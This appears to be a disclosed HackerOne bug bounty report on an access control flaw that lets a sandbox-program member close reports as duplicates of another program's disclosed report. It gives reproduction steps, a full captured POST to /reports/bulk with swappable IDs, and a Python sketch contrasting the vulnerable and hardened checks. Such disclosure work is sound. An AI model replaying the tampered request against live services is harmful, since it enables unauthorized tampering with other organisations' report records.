History: May 22, 2024 - 7:54 p.m.

HackerOne: Access Control Vulnerability Enabling Unauthorized Access to Limited Disclosure Reports

2024-05-22 19:54:27
akashhamal0x01
hackerone.com
16
access control vulnerability
unauthorized access
limited disclosure

AI Score

7.2

Confidence

Low

Summary:

Hi there, I hope you are doing well :)

I found a vulnerability which allows me to close a report as a duplicate of another program's report. This can cause problems in various ways; I will include some of them, and the rest needs to be verified on HackerOne's side, including what additional impact it can cause and its root cause analysis.

Steps To Reproduce

  1. Create a Sandbox program
  2. Invite a user with Report and Engagement access
  3. Accept invitation from User B and login
  4. Check any report and select the option to Close Report as duplicate; this will be the HTTP request:

POST /reports/bulk HTTP/2
Host: hackerone.com
Cookie: <USER B Cookies>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://hackerone.com/reports/2424755
X-Csrf-Token: <USER B CSRF TOKEN>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-Datadog-Origin: rum
X-Datadog-Parent-Id: 2173163794632761452
X-Datadog-Sampling-Priority: 1
X-Datadog-Trace-Id: 3844362884923386826
Content-Length: 289
Origin: https://hackerone.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

message=s&substate=duplicate&original_report_id=███████&reference=&add_reporter_to_original=false&reply_action=close-report&mark_ineligible_for_bounty=false&unassign_report_on_close=false&code_review_patch=&code_review_diff_url=&reports_count=1&report_ids%5B%5D=<your report ID>&bounty_currency=USD

Here, only replace the values enclosed inside <> and then forward the request. Notice that the response is 200 OK and the report is closed as a duplicate of █████, which is a publicly disclosed report of the HackerOne program.
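What the missing server-side check looks like, as an added Python sketch that is not HackerOne's code: a model of the /reports/bulk duplicate-close handler that parses the form body shown above and, in the hardened version, authorizes original_report_id the same way as the reports being closed. The report IDs, program IDs, user ID and memberships are constructed.

```python
from urllib.parse import parse_qs

# Constructed sample data: program 1 is the sandbox program; report 901 belongs to a
# different program (2) and stands in for the publicly disclosed report in the write-up.
REPORT_PROGRAM = {101: 1, 102: 1, 901: 2}   # report id -> owning program id
MEMBERSHIPS = {(7, 1)}                       # (user id, program id) with Report and Engagement access

def can_manage(user_id, report_id):
    """True if the user has report-management access in the report's program."""
    return (user_id, REPORT_PROGRAM.get(report_id)) in MEMBERSHIPS

def parse_bulk_body(body):
    """Parse the x-www-form-urlencoded body of POST /reports/bulk (report_ids%5B%5D decodes to report_ids[])."""
    q = parse_qs(body, keep_blank_values=True)
    return {
        "substate": q.get("substate", [""])[0],
        "original_report_id": int(q["original_report_id"][0]),
        "report_ids": [int(v) for v in q.get("report_ids[]", [])],
    }

def close_as_duplicate_vulnerable(user_id, body):
    """Models the reported behaviour: only the reports being closed are authorized."""
    p = parse_bulk_body(body)
    if not all(can_manage(user_id, r) for r in p["report_ids"]):
        raise PermissionError("no access to a report being closed")
    # Missing check: original_report_id is used as-is, so it may point into any program.
    return [(r, p["original_report_id"]) for r in p["report_ids"]]

def close_as_duplicate_hardened(user_id, body):
    """Same handler, but the original report is authorized exactly like the targets."""
    p = parse_bulk_body(body)
    if p["substate"] != "duplicate":
        raise ValueError("handler only covers duplicate closes")
    original = p["original_report_id"]
    if not can_manage(user_id, original):
        raise PermissionError("original report is not in a program the actor manages")
    closed = []
    for r in p["report_ids"]:
        if not can_manage(user_id, r):
            raise PermissionError("no access to a report being closed")
        if REPORT_PROGRAM[r] != REPORT_PROGRAM[original] or r == original:
            raise ValueError("duplicate must reference a different report in the same program")
        closed.append((r, original))
    return closed

# Constructed bodies in the shape of the captured request; only the IDs differ.
CROSS_PROGRAM_BODY = ("message=s&substate=duplicate&original_report_id=901&reference="
                      "&reply_action=close-report&reports_count=1&report_ids%5B%5D=101")
SAME_PROGRAM_BODY = CROSS_PROGRAM_BODY.replace("original_report_id=901", "original_report_id=102")
```

The vulnerable handler accepts the cross-program body and records 101 as a duplicate of 901; the hardened one rejects it and only accepts an original report from a program the actor can manage.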

Impact

There were many scenarios in my mind regarding impact, but these are the most relevant ones:

It can impact automation pipelines, because there can be many reports and the program can mistakenly enter another report's ID.

This one is just an assumption, but I believe it is possible:

When you close a report as a duplicate of another report (the original report), the right side panel shows the reports which are duplicates of that particular report, like this:

{F3291232}

So my assumption is that it might show like this to the program team in a genuine publicly disclosed report, as the attacker can dupe his/her report to a public report, and the public report will be shown like that to the program manager or the viewers (participants or collaborators). This alternatively means it gives any attacker the ability to make other public reports look like they have duplicates, but the duplicates are other reports from another program.

The remaining impact, root cause and potential impacts are to be evaluated by the H1 team, as I am limited by my sandbox program and its privileges.
